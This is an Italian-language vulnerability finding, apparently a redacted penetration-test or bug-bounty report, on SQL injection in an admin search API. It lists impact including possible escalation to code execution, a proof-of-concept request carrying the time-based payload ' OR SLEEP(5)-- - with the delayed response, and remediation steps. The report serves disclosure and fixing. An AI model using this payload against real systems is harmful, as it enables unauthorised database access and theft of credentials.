SQL injection nel parametro di ricerca del pannello admin
- Target
- app.████████.io
- Endpoint
- POST /api/v1/admin/search
- Vettore
- boolean-based blind, UNION-based
- Rilevato
- 2025-03-▆▆ · 14:2█ UTC
Impatto
Lettura dell'intero database applicativo, inclusi hash delle credenziali admin e token di sessione attivi. Escalation a RCE probabile via SELECT ... INTO OUTFILE se secure_file_priv non è configurato.
PoC
POST /api/v1/admin/search HTTP/2
Host: app.████████.io
Authorization: Bearer ██████████████
Content-Type: application/json
{"q":"' OR SLEEP(5)-- -","scope":"users"}
── response ──────────────────────────────────
HTTP/2 200
x-response-time: 5042ms ▸ time-based oracle confermato Remediation
- ▸ Parameterized queries / prepared statements sul layer di accesso dati.
- ▸ Input validation allow-list per il parametro q.
- ▸ WAF rule di contenimento come mitigazione di seconda linea (non sostitutiva).
- ▸ Rotazione credenziali DB e invalidazione sessioni admin.